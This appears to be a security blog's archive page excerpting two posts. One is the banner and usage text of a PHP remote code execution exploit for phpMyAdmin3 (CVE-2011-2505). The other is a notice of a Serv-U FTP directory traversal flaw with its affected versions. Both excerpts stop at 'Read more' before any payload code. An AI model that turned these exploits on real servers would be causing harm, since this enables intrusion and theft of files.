Archive

Archive for the 'Application Security' category

phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]

December 26, 2011 3 comments
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');
/**
* working when the directory:"config" exists and is writeable.
**/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
Read more…
Category: Application Security Tags:

Serv-U FTP Server Jail Break 0day

December 1, 2011 4 comments
[*]----------------------------------------------------[*]
    Serv-U FTP Server Jail Break 0day
    Discovered By Kingcope
    Year 2011
[*]----------------------------------------------------[*]

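/*
Traverses the server's directories by constructing ..:/ sequences, allowing arbitrary files to be downloaded.
Affected versions: 6.4, 7.1, 7.3, 8.2, 10.5
*/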

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]

Read more…

Category: Application Security Tags: